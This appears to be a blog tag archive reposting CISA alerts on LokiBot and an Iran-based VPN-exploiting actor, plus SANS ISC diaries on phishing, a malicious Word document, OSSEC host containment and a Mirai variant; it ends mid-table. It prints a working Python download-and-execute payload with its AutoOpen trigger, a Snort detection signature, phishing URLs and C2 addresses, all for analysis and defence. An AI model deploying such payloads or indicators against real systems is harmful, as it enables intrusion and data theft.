Tag Archives: Security

Security

AA20-266A: LokiBot Malware

Leave a comment
This post was originally published on this site

Original release date: September 22, 2020

Summary

This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise frameworks for all referenced threat actor techniques.

This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions by the Multi-State Information Sharing & Analysis Center (MS-ISAC).

CISA has observed a notable increase in the use of LokiBot malware by malicious cyber actors since July 2020. Throughout this period, CISA’s EINSTEIN Intrusion Detection System, which protects federal, civilian executive branch networks, has detected persistent malicious LokiBot activity. LokiBot uses a credential- and information-stealing malware, often sent as a malicious attachment and known for being simple, yet effective, making it an attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases.

Technical Details

LokiBot—also known as Lokibot, Loki PWS, and Loki-bot—employs Trojan malware to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials.

  • The malware steals credentials through the use of a keylogger to monitor browser and desktop activity (Credentials from Password Stores [T1555]).
    • (Credentials from Password Stores: Credentials from Web Browsers [T1555.003])
    • (Input Capture: Keylogging [T1056.001])
  • LokiBot can also create a backdoor into infected systems to allow an attacker to install additional payloads (Event Triggered Execution: Accessibility Features [T1546.008]).
  • Malicious cyber actors typically use LokiBot to target Windows and Android operating systems and distribute the malware via email, malicious websites, text, and other private messages (User Execution: Malicious File [T1204.002]). See figure 1 for enterprise techniques used by LokiBot.

Figure 1: MITRE ATT&CK enterprise techniques used by LokiBot

Since LokiBot was first reported in 2015, cyber actors have used it across a range of targeted applications, including the following.

  • February 2020: Trend Micro identified cyber actors using LokiBot to impersonate a launcher for Fortnite—a popular video game.[1]
  • August 2019: FortiGuard SE researchers discovered a malspam campaign distributing LokiBot information-stealing payloads in spearphishing attack on a U.S. manufacturing company.[2]
  • August 2019: Trend Micro researchers reported LokiBot malware source code being hidden in image files spread as attachments in phishing emails.[3]
  • June 2019: Netskope uncovered LokiBot being distributed in a malspam campaign using ISO image file attachments.[4]
  • April 2019: Netskope uncovered a phishing campaign using malicious email attachments with LokiBot malware to create backdoors onto infected Windows systems and steal sensitive information.[5]
  • February 2018: Trend Micro discovered CVE-2017-11882 being exploited in an attack using Windows Installer service to deliver LokiBot malware.[6]
  • October 2017: SfyLabs identified cyber actors using LokiBot as an Android banking trojan that turns into ransomware.[7]
  • May 2017: Fortinet reported malicious actors using a PDF file to spread a new LokiBot variant capable of stealing credentials from more than 100 different software tools.[8]
  • March 2017: Check Point discovered LokiBot malware found pre-installed on Android devices.[9]
  • December 2016: Dr.Web researchers identified a new LokiBot variant targeting Android core libraries.[10]
  • February 2016: Researchers discovered the LokiBot Android Trojan infecting the core Android operating system processes.[11]

MITRE ATT&CK Techniques

According to MITRE, LokiBot uses the ATT&CK techniques listed in table 1.

Table 1: LokiBot ATT&CK techniques

Technique

Use

System Network Configuration Discovery [T1016]

LokiBot has the ability to discover the domain name of the infected host.

Obfuscated Files or Information [T1027]

LokiBot has obfuscated strings with base64 encoding.

Obfuscated Files or Information: Software Packing [T1027.002]

LokiBot has used several packing methods for obfuscation.

System Owner/User Discovery [T1033]

LokiBot has the ability to discover the username on the infected host.

Exfiltration Over C2 Channel [T1041]

LokiBot has the ability to initiate contact with command and control to exfiltrate stolen data.

Process Injection: Process Hollowing [T1055.012]

LokiBot has used process hollowing to inject into legitimate Windows process vbc.exe.

Input Capture: Keylogging [T1056.001]

LokiBot has the ability to capture input on the compromised host via keylogging.

Application Layer Protocol: Web Protocols [T1071.001]

LokiBot has used Hypertext Transfer Protocol for command and control.

System Information Discovery [T1082]

LokiBot has the ability to discover the computer name and Windows product name/version.

User Execution: Malicious File [T1204.002]

LokiBot has been executed through malicious documents contained in spearphishing emails.

Credentials from Password Stores [T1555]

LokiBot has stolen credentials from multiple applications and data sources including Windows operating system credentials, email clients, File Transfer Protocol, and Secure File Transfer Protocol clients.

Credentials from Password Stores: Credentials from Web Browsers [T1555.003]

LokiBot has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and Chromium and Mozilla Firefox-based web browsers.

Hide Artifacts: Hidden Files and Directories [T1564.001]

LokiBot has the ability to copy itself to a hidden file and directory.

Detection

Signatures

CISA developed the following Snort signature for use in detecting network activity associated with LokiBot activity.

alert tcp any any -> any $HTTP_PORTS (msg:”Lokibot:HTTP URI POST contains ‘/*/fre.php’ post-infection”; flow:established,to_server; flowbits:isnotset,.tagged; content:”/fre.php”; http_uri; fast_pattern:only; urilen:<50,norm; content:”POST”; nocase; http_method; pcre:”//(?:alien|lokyd|donep|jemp|lokey|new2|loki|Charles|sev7n|dbwork|scroll/NW|wrk|job|fived?|donemy|animationdkc|love|Masky|vd|lifetn|Ben)/fre.php$/iU”; flowbits:set,.tagged;classtype:http-uri; metadata:service http; metadata:pattern HTTP-P001,)

Mitigations

CISA and MS-ISAC recommend that federal, state, local, tribal, territorial government, private sector users, and network administrators consider applying the following best practices to strengthen the security posture of their organization’s systems. System owners and administrators should review any configuration changes prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines. See Protecting Against Malicious Code.
  • Keep operating system patches up to date. See Understanding Patches and Software Updates.
  • Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Enforce multi-factor authentication. See Supplementing Passwords for more information.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators’ group unless required.
  • Enforce a strong password policy. See Choosing and Protecting Passwords.
  • Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See Using Caution with Email Attachments.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious email attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).
  • Scan all software downloaded from the internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate access control lists.
  • Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.

For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops.

Resources

Center for Internet Security Security Event Primer – Malware: https://www.cisecurity.org/white-papers/security-event-primer-malware/
MITRE ATT&CK – LokiBot: https://attack.mitre.org/software/S0447/
MITRE ATT&CK for Enterprise: https://attack.mitre.org/matrices/enterprise/

References

Revisions

  • September 22, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Security

Slightly broken overlay phishing, (Mon, Sep 21st)

Leave a comment
This post was originally published on this site

At the Internet Storm Center, we often receive examples of interesting phishing e-mails from our readers. Of course, this is not the only source of interesting malicious messages in our inboxes – sometimes the phishing authors “cut out the middleman” and send their creations directly to us. Last week, this was the case with a slightly unusual (and slightly broken) phishing, which tries to use legitimate pages overlaid with a fake login prompt.

We were not the first ones to receive a similar message[1], however as our example was slightly different to the one recorded before and the servers, which the attackers used, were still active at the time of writing, I thought this campaign might deserve a second look.

The message itself was a fairly generic phishing, using the commonly seen lure of the type “you have quarantined messages, review them now or they will be deleted”.

The only thing of note in the message was the link, which the victim was supposed to open. It pointed to the following, slightly broken URL.

http[:]//'.$domin.'@antiochspore[.]com[.]sg/portal/?handlers@sans.edu&email=handlers@sans.edu&aGFuZGxlcnNAc2Fucy5lZHU=

It seems that the correct value for the $domin variable was not included in the link, which was supposed to start with “sans.edu”, probably so it would look more legitimate. The link contains three parameters, all of which hold the e-mail address of the recipient – one in plaintext, one in Base64 encoded form and one, where the address is set as value for a parameter named “email”. The latter parameter is the only one which is used by the phishing website for personalization of the content and the inclusion of the other two appears to be completely useless – they may be omitted form the link with no impact on its functionality.

After the URL is opened, the victim is supposed to be redirected from antiochspore[.]com[.]sg to en[.]garden-max[.]eu, where they should see a legitimate page, loaded (in an iframe) from the domain to which the address in the “email” parameter belongs, overlaid with a fake login prompt (see the first picture). This technique, though not new, is imaginative and might lead to convincingly looking results in some cases. In others however, it fails quite spectacularly. Most sites which offer web-based access to e-mail (among others) actively block attempts to be loaded in iframes using the X-Frame-Options HTTP header[2]. If the address in the “email” parameter belongs to such a site, the attempt to load the page in an iframe ends with either only the overlay with login prompt being shown, or – depending on the browser used – results in an error message being displayed under the prompt.

It is worth mentioning that even in cases when the page is displayed correctly, the resulting effect might not always be convincing. For some reason, the overlay has a fixed width set to 1366 pixels.

This means that on larger screens, parts of the underlying page are not covered by it, which looks suspicious to say the least.

Although the technique of overlaying legitimate pages with a fake login prompts is not uninteresting and could potentially be effective against users of certain services, due to use of mechanisms which prevent its effective employment on many modern websites, it hardly presents a mainstream threat.

In case of this campaign, this is compounded by the incorrectly created link with unused parameters and the limited overlay used to cover the legitimate page. This would seem to indicate that whoever is behind this campaign either just used a phishing kit and deployed it with “out of the box” configuration or that they just didn’t spend much time testing their creation.

In any case, although the technique doesn’t pose too large a threat when it comes to real world phishing, it might not be a bad choice for use in a security awareness exercise/phishing tests…

 

Indicators of Compromise (IoCs)
http[:]//antiochspore[.]com[.]sg/portal/
https[:]//en[.]garden-max[.]eu/userfiles/mail/

 

[1] https://cofense.com/message-quarantine-campaign-overlying-potential/
[2] https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options

———–
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security

Analysis of a Salesforce Phishing Emails, (Sun, Sep 20th)

Leave a comment
This post was originally published on this site

Over the past week, I have noticed several phishing emails linked to Salesforce asking to confirm the recipient’s email address.

Sample Header


The body of the email is quite simple. Reviewing the email View Message URL by hovering over the URL or changing email to text mode and comparing it against the correct Salesforce website URL, it clearly shows the client is getting phished.

Email Body

The next thing on the verification list for this email is the SSL certificate of the site; it was created yesterday (18 Sep 2020) and this email was received today (see sample header). The certificate is authenticated by ZeroSSL which is considered an alternative to Let’s Encrypt where you can also create for free a certificate valid for 90 day.

ZeroSSL Certificate Information

The root domain associated with login.salesforce.com-secur-login-portal.qualitytags[.]com and www[.] qualitytags[.]com are both resolving to 162.241.159.57 but www[.] qualitytags[.]com is using a Let’s Encrypt certificate setup on the 25 Aug 2020 good for 90 days.

Let’s Encrypt Certificate Information

These few simple steps can be used to verify the legitimacy of a website by examining the certificate information, its URL and manually do a quick search to confirm the website URL contained in the email is the same as the true website. The From: email address from the header (info@saggioventures[.]com) doesn’t match the domain name which would be another clue that something is suspicious. If unsure, it is a good idea to report it to the security team for analysis.

[1] https://zerossl.com
[2] https://letsencrypt.org
[3] https://isc.sans.edu/ipinfo.html?ip=162.241.159.57

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security

A Mix of Python & VBA in a Malicious Word Document, (Fri, Sep 18th)

Leave a comment
This post was originally published on this site

A few days ago, Didier wrote an interesting diary about embedded objects into an Office document[1]. I had a discussion about an interesting OLE file that I found. Because it used the same technique, I let Didier publish his diary first. Now, let’s have a look at the document.

It’s an OLE file that contains an embedded object:

$ docker run -it --rm -v $(pwd):/malware rootshell/dssuite oledump.py oleObject1.bin
  1:        76 'x01CompObj'
  2: O     471 'x01Ole10Native'
  3:         6 'x03ObjInfo'
$ docker run -it --rm -v $(pwd):/malware rootshell/dssuite oledump.py oleObject1.bin -s 2 -d
?pJIkdw.pyC:UsersCNIyiDesktoppJIkdw.py7C:UsersCNIyiAppDataLocalTemppJIkdw (2).pyr
import socket
import tempfile
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.2.100", 8080))
buf = ""
while True:
  data = s.recv(1024)
  if data:
    buf += data
  else:
    break
s.close
temp = tempfile.gettempdir() + "" + "JcNrGlx.exe"
f = open(temp, "wb")
f.write(buf)
f.close
f = None
os.system(temp)

The code is easy to understand: It connects to 192.168.2.100:8000, fetches a malicious PE file, dumps it on disk, and executes it. Note the private IP address used (RFC1918). It should be a test file (or from a red-team exercise?). The file hash is 40ae709cb1d6335c3a41863d2dca21bfa7bd493ebb3d7ddd72da4e09b09b2988 with a VT score of 5/60[2]. I searched via VT for more information about this file and found the document where it was coming from. 

It’s a Word document (9f40fd5596a5d9f195017a5cae09799af8755f1436b8b9edbed768ccaa5dba67) with a VT score of 8/63[3]. The file contains indeed our original OLE file as reported by oledump.py:

$ docker run -it --rm -v $(pwd):/malware rootshell/dssuite oledump.py malicious.docx
A: word/vbaProject.bin
 A1:       348 'PROJECT'
 A2:        71 'PROJECTwm'
 A3: M    1327 'VBA/NewMacros'
 A4: m     924 'VBA/ThisDocument'
 A5:      2649 'VBA/_VBA_PROJECT'
 A6:      1082 'VBA/__SRP_0'
 A7:       104 'VBA/__SRP_1'
 A8:        84 'VBA/__SRP_2'
 A9:       107 'VBA/__SRP_3'
A10:       570 'VBA/dir'
B: word/embeddings/oleObject1.bin
 B1:        76 'x01CompObj'
 B2: O     471 'x01Ole10Native'
 B3:         6 'x03ObjInfo'

The macro in stream 3 is very simple:

$ docker run -it --rm -v $(pwd):/malware rootshell/dssuite oledump.py malicious.docx -s 3 -v
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.AutoOpen"
'
' AutoOpen Macro
'
'
    ActiveDocument.Shapes("Object 2").Select
    Selection.ShapeRange(1).OLEFormat.DoVerb VerbIndex:=wdOLEVerbPrimary
End Sub

The method (OLEFormat.DoVerb) requests an OLE object to perform the verb passed as argment[4]. ‘wdOLEVerbPrimary’ means to perform the verb that is invoked when the user double-clicks the object. The code will be executed only if Python is available on the targeted host.

The Word document seems corrupted and doesn’t open properly in my sandbox. But looking at the files inside the zip archive, you discover that the OLE file is indeed embedded:

<Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/>

And:

<o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_s1026" DrawAspect="Content" ObjectID="_1400592552" r:id="rId7"/>

Yesterday, I found new occurrences of the same OLE file but trying to connect to other IP addresses:

  • 192.168.2.108:8080
  • 192.168.1.4:8080
  • %%ip:156.132.142.28%%:99

Interestingly, the last IP address (the routable one) belongs to uscourts.gov (United States Courts)! The purpose of the file is still unclear but, being based on a Python payload, I presume the victim is targeted. Or, as I already did in the past, I spotted a red-team exercise preparation?

[1] https://isc.sans.edu/forums/diary/Office+Documents+with+Embedded+Objects/26558/
[2] https://bazaar.abuse.ch/sample/40ae709cb1d6335c3a41863d2dca21bfa7bd493ebb3d7ddd72da4e09b09b2988/
[3] https://bazaar.abuse.ch/sample/9f40fd5596a5d9f195017a5cae09799af8755f1436b8b9edbed768ccaa5dba67/
[4] https://docs.microsoft.com/en-us/office/vba/api/word.oleformat.doverb

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security

Suspicious Endpoint Containment with OSSEC, (Thu, Sep 17th)

Leave a comment
This post was originally published on this site

When a host is compromised/infected on your network, an important step in the Incident Handling process is the “containment” to prevent further infections.  To place the device into a restricted environment is definitively better than powering off the system and, probably, lose some pieces of evidence.

Endpoint protection solutions are the “in” thing for a while. Instead of using standard AV tools, those solutions implement more control and try to block attackers directly. One of the features they implement is a containment solution to prevent a compromised host to communicate over the network, except with the endpoint management console. An endpoint solution can be expensive if you have a lot of hosts to protect and… it’s (again) a new agent to deploy on them.

I’m a big fan of OSSEC[1] and I already wrote a few diaries about it[2][3]. Today, I’ll demonstrate how you can implement the function described above without an expensive solution. OSSEC has a feature called ‘Active-Response’ that helps to execute scripts on agents in case of specific alerts or… on demand!

I wrote a Windows command line script that temporarily replaces the existing local firewall rules by a very restricted new set:

  • Communication with the OSSEC server is still allowed
  • An IP address is allowed on all ports TCP/UDP
  • All remaining traffic is blocked

This allows a security team to temporarily isolate a suspicious computer from the network and to start some investigations by allowing a SIFT Workstation to connect to the host.

To configure this, in your ossec.conf file, create the new active-response setup:

<command>
    <name>contain-host</name>
    <executable>contain-me.cmd</executable>
    <expect>srcip</expect>
    <timeout_allowed>no</timeout_allowed>
</command>

Note: It’s important to not configure any timeout to prevent the host to be “unconfined” automatically.

Then, create the active-response action:

<active-response>
    <command>contain-host</command>
    <location>local</location>
    <level>10</level>
    <rules_id>99999999</rules_id>
</active-response>

If you want to automatically contain a host, you may create rules: use ‘rules_group’ or ‘rules_id’. My rule_id ‘99999999’ will never trigger because it looks for something that will never happen! This way, you can prevent an automatic containment of a host.

Finally, deploy the script in the right directory (%OSSECPATH%active-responsebin) on all your OSSEC monitored hosts and you’re good to go!

How to contain a host, manually? OSSEC has a command to achieve this:

[root@ossec bin]# ./agent_control -u 011 -f contain-host0 -b 192.168.254.212

Where ‘011’ is the agent ID you’d like to contain and ‘contain-host0’ is the defined active-response action. In the case above, 192.168.254.212 is the IP address of the incident handler that will investigate the suspicious host.

Here is a copy of the script:

:: Script to block all traffic except interesting hosts:
:: - The OSSEC server
:: - Incident Handling workstation (ex: a SANS SIFT)
:: Parameters:
:: - %1 = ADD|DELETE
:: - %2 = User (unused)
:: - %3 = IP address to whitelist

@echo off

:: Generate timestamp variables
for /F "TOKENS=1* DELIMS= " %%A IN ('DATE/T') DO SET DAT=%%A %%B
for /F "TOKENS=1-3 DELIMS=:" %%A IN ("%TIME%") DO SET TIM=%%A:%%B:%%C

:: Extract the OSSEC server IP address from config
setlocal EnableDelayedExpansion
(for /F "delims=" %%a in ('findstr /R "<server-ip>.*</server-ip>$" "%OSSECPATH%ossec.conf"') do (
set "line=%%a"
set "line=!line:*<server-ip>=!"
for /F "delims=<" %%b in ("!line!") do set OSSECIP=%%b
))
if /I "%OSSECIP%"=="" goto ERROR2

:: Check for required arguments
if /I "%1"=="" goto ERROR
if /I "%2"=="" goto ERROR
if /I "%3"=="" goto ERROR

:: Check for a valid IP
echo "%3" | %WINDIR%system32findstr.exe /R "." >nul || goto ERROR

if /I "%1"=="add" goto ADD
if /I "%1"=="delete" goto DEL

:ERROR
echo Invalid argument(s).
echo Usage: contain-me.cmd ^(ADD^|DELETE^) user IP_Address
echo Example: contain-me.cmd ADD - 1.2.3.4
exit /B 1

:ERROR2
echo Cannot find OSSEC server IP address in ossec.conf
exit /B 1

:ADD

:: Save the existing firewall rules
del %OSSECPATH%fw-backup.wfw" >nul
%WINDIR%system32netsh advfirewall export "%OSSECPATH%fw-backup.wfw"
%WINDIR%system32NETSH ADVFIREWALL FIREWALL SET RULE all NEW enable=no
:: Allow the OSSEC server IP
%WINDIR%system32netsh advfirewall firewall add rule name="Allow ICMP in" dir=in protocol=icmpv4 action=allow
%WINDIR%system32netsh advfirewall firewall add rule name="Allow ICMP out" dir=out protocol=icmpv4 action=allow
%WINDIR%system32netsh advfirewall firewall add rule name="Allow OSSEC Server in"  dir=in localport=1514 remoteip=%OSSECIP%/32 protocol=udp action=allow
%WINDIR%system32netsh advfirewall firewall add rule name="Allow OSSEC Server out" dir=out localport=1514 remoteip=%OSSECIP%/32 protocol=udp action=allow
%WINDIR%system32netsh advfirewall firewall add rule name="Allow OSSEC Server in/tcp"  dir=in localport=any remoteip=%3/32 protocol=tcp action=allow
%WINDIR%system32netsh advfirewall firewall add rule name="Allow OSSEC Server in/udp"  dir=in localport=any remoteip=%3/32 protocol=udp action=allow
%WINDIR%system32netsh advfirewall firewall add rule name="Allow OSSEC Server out/tcp" dir=out localport=any remoteip=%3/32 protocol=tcp action=allow
%WINDIR%system32netsh advfirewall firewall add rule name="Allow OSSEC Server out/udp" dir=out localport=any remoteip=%3/32 protocol=udp action=allow
%WINDIR%system32netsh advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound
echo %DAT%%TIM% %~dp0%0 %1 %2 %3 >> "%OSSECPATH%active-responseactive-responses.log"
goto EXIT

:DEL

:: Restore the saved firewall rules
%WINDIR%system32netsh advfirewall import "%OSSECPATH%fw-backup.wfw"
echo %DAT%%TIM% %~dp0%0 %1 %2 %3 >> "%OSSECPATH%active-responseactive-responses.log"

exit /B 0:

It will automatically extract the OSSEC server IP address from the config file and allow it. It will also backup your existing firewall rules and restore them.

There is no way to automatically restore the connectivity via OSSEC (when it’s not automatic). Once you completed the investigations on the host, just restore the previous firewall settings:

C:Program Files (x86)ossec-agentactive-responsebin>set OSSECPATH=c:Program Files (x86)ossec-agent
C:Program Files (x86)ossec-agentactive-responsebin>contain-me.cmd delete - 192.168.254.212

Or you can write a second active-response script to “uncontain” the host…

I implemented this script for Windows endpoints but it’s very easy to implement the same on other operating systems.

[1] https://ossec.net
[2] https://isc.sans.edu/forums/diary/Using+OSSEC+ActiveResponse+as+a+DFIR+Framework/24440
[3] https://isc.sans.edu/forums/diary/Hunting+for+Suspicious+Processes+with+OSSEC/24122

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security

Do Vulnerabilities Ever Get Old? Recent “Mirai” Variant Scanning for 20 Year Old Amanda Version?, (Wed, Sep 16th)

Leave a comment
This post was originally published on this site

We always say how network security is changing every day. Take a long lunch, and you may miss a critical exploit. But sometimes, time appears to stand still. We just passed 1.6 Billion seconds in the Unix Epoch. Back when the Unix timestamp still had 9 digits, in the late 90s also known as “pre Y2K”, one of the servers you may have used for backups was Amanda (Advanced Maryland Automatic Network Disk Archiver). Still active and alive today, back then Amanda V 2.3 was current. 

Amanda typically listens on port %%port:10080%%, and while port 10080 is scanned, we see not a lot of scans for that port. Shodan also comes up with “not much” for port 10080.

So I was a bit surprised to see these strings in a recent Mirai type bot I captured:

Amanda 2.3 REQ HANDLE 000-65637373 SEQ 954568800
SERVICE amanda

This particular string is used by Nessus since July 14th 2000 (maybe longer). The version “2.3” is a bit misleading here. This is a request that is typically sent to the Amanda client (not server). Nessus uses this request to detect the client’s version. So this may as well look for more recent Amanda client versions.

So is it looking for a 20-year-old version? Possibly not. Why is it looking for backup clients? There are many possibilities:

  • Data exfiltration: Unusual for Mirai bots, but this version appears to be “work in progress”. Someone may be trying to use this to scan for internal Amanda clients once a network is breached.
  • Ransomware: Ransomware doesn’t like backups. Again not typical for Mirai, but a simple “delete all files, including backups” is certainly in scope and some Mirai variants like “Bricker Bot” did show destructive behavior.

I am still trying to trigger the Amanda scan behavior. So far, I had no luck with it and all the bot did so far is scan for port 23 (this is why I call it “Mirai”). It also connects to a C2 server at %%ip:45.145.185.94%%. This IP address is hardcoded and no DNS lookup is performed. 

Virustotal: https://www.virustotal.com/gui/file/24f597ad10f4c2be2c27356adde514c59f05a524737f6a7c8461627bbb9b1e5c/detection

 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security

AA20-259A: Iran-Based Threat Actor Exploits VPN Vulnerabilities

Leave a comment
This post was originally published on this site

Original release date: September 15, 2020

Summary

This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.

This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions from the Federal Bureau of Investigation (FBI). CISA and FBI are aware of an Iran-based malicious cyber actor targeting several U.S. federal agencies and other U.S.-based networks. Analysis of the threat actor’s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence.

This Advisory provides the threat actor’s TTPs, IOCs, and exploited CVEs to help administrators and network defenders identify a potential compromise of their network and protect their organization from future attacks.

Click here for a PDF version of this report.

Technical Details

CISA and FBI are aware of a widespread campaign from an Iran-based malicious cyber actor targeting several industries mainly associated with information technology, government, healthcare, financial, insurance, and media sectors across the United States. The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902.

After gaining initial access to a targeted network, the threat actor obtains administrator-level credentials and installs web shells allowing further entrenchment. After establishing a foothold, the threat actor’s goals appear to be maintaining persistence and exfiltrating data. This threat actor has been observed selling access to compromised network infrastructure in an online hacker forum. Industry reporting indicates that the threat actor operates as a contractor supporting Iranian government interests, but the malicious activity appears to also serve the threat actor’s own financial interests. The FBI notes this threat actor has the capability, and likely the intent, to deploy ransomware on victim networks.

CISA and FBI have observed this Iran-based threat actor relying on exploits of remote external services on internet-facing assets to gain initial access to victim networks. The threat actor also relies heavily on open-source and operating system (OS) tooling to conduct operations, such as ngrok; fast reverse proxy (FRP); Lightweight Directory Access Protocol (LDAP) directory browser; as well as web shells known as ChunkyTuna, Tiny, and China Chopper.

Table 1 illustrates some of the common tools this threat actor has used.

Table 1: Common exploit tools

Tool

Detail

ChunkyTuna web shell

 ChunkyTuna allows for chunked transfer encoding hypertext transfer protocol (HTTP) that tunnels Transmission Control Protocol (TCP) streams over HTTP. The web shell allows for reverse connections to a server with the intent to exfiltrate data.

Tiny web shell

 Tiny uses Hypertext Preprocessor (PHP) to create a backdoor. It has the capability to allow a threat actor remote access to the system and can also tunnel or route traffic.

China Chopper web shell

 China Chopper is a web shell hosted on a web server and is mainly used for web application attacks; it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords.
FRPC FRPC is a modified version of the open-source FRP tool. It allows a system—inside a router or firewall providing Network Address Translation—to provide network access to systems/operators located outside of the victim network. In this case, FRPC was used as reverse proxy, tunneling Remote Desktop Protocol (RDP) over Transport Layer Security (TLS), giving the threat actor primary persistence.
Chisel Chisel is a fast TCP tunnel over HTTP and secured via Secure Shell (SSH). It is a single executable that includes both client and server. The tool is useful for passing through firewalls, but it can also be used to provide a secure form of communication to an endpoint on a victim network.
ngrok ngrok is a tool used to expose a local port to the internet. Optionally, tunnels can be secured with TLS.
Nmap Nmap is used for vulnerability scanning and network discovery.
Angry IP Scanner Angry IP Scanner is a scanner that can ping a range of Internet Protocol (IP) addresses to check if they are active and can also resolve hostnames, scan ports, etc.
Drupwn Drupwn is a Python-based tool used to scan for vulnerabilities and exploit CVEs in Drupal devices.

Notable means of detecting this threat actor:

  • CISA and the FBI note that this group makes significant use of ngrok, which may appear as TCP port 443 connections to external cloud-based infrastructure.
  • The threat actor uses FRPC over port 7557.
  • Malware Analysis Report MAR-10297887-1.v1 details some of the tools this threat actor used against some victims.

The following file paths can be used to detect Tiny web shell, ChunkyTuna web shell, or Chisel if a network has been compromised by this attacker exploiting CVE-2019-19781.

  • Tiny web shell

       /netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php
       /netscaler/ns_gui/vpn/images/vpn_ns_gui.php
       /var/vpn/themes/imgs/tiny.php

  • ChunkyTuna web shell

       /var/vpn/themes/imgs/debug.php
       /var/vpn/themes/imgs/include.php
       /var/vpn/themes/imgs/whatfile

  • Chisel

       /var/nstmp/chisel

MITRE ATT&CK Framework

Initial Access

As indicated in table 2, the threat actor primarily gained initial access by using the publicly available exploit for CVE-2019-19781. From there, the threat actor used the Citrix environment to establish a presence on an internal network server.

Table 2: Initial access techniques

ID

Technique/Sub-Technique

Context

T1190

 Exploit Public-Facing Application The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781. The threat actor also exploited CVE-2019-11510, CVE-2019-11539, and CVE-2020-5902.

Execution

After gaining initial access, the threat actor began executing scripts, as shown in table 3.

Table 3: Execution techniques

ID

Technique/Sub-Technique

Context

T1059.001

 Command and Scripting Interpreter: PowerShell A PowerShell script (keethief and kee.ps1) was used to access KeePass data.

T1059.003

 Command and Scripting Interpreter: Windows Command Shell cmd.exe was launched via sticky keys that was likely used as a password changing mechanism.

Persistence

CISA observed the threat actor using the techniques identified in table 4 to establish persistence.

Table 4: Persistence techniques

ID

Technique/Sub-Technique

Context

T1053.003

 Scheduled Task/Job: Cron The threat actor loaded a series of scripts to cron and ran them for various purposes (mainly to access NetScaler web forms).

T1053.005

 Scheduled Task/Job: Scheduled Task The threat actor installed and used FRPC (frpc.exe) on both NetScaler and internal devices. The task was named lpupdate and the binary was named svchost, which was the reverse proxy. The threat actor executed this command daily.

T1505.003

 Server Software Component: Web Shell The threat actor used several web shells on existing web servers. Both NetScaler and web servers called out for ChunkyTuna.

T1546.008

 Event Triggered Execution: Accessibility Features The threat actor used sticky keys (sethc.exe) to launch cmd.exe.

Privilege Escalation

CISA observed no evidence of direct privilege escalation. The threat actor attained domain administrator credentials on the NetScaler device via exploit and continued to expand credential access on the network.

Defense Evasion

CISA observed the threat actor using the techniques identified in table 5 to evade detection.

Table 5: Defensive evasion techniques

ID

Technique/Sub-Technique

Context

T1027.002

 Obfuscated Files or Information: Software Packing The threat actor used base64 encoding for payloads on NetScaler during initial access, making the pre-compiled payloads easier to avoid detection.

T1027.004

 Obfuscated Files or Information: Compile After Delivery The threat actor used base64 encoding schemes on distributed (uncompiled) scripts and files to avoid detection.

T1036.004

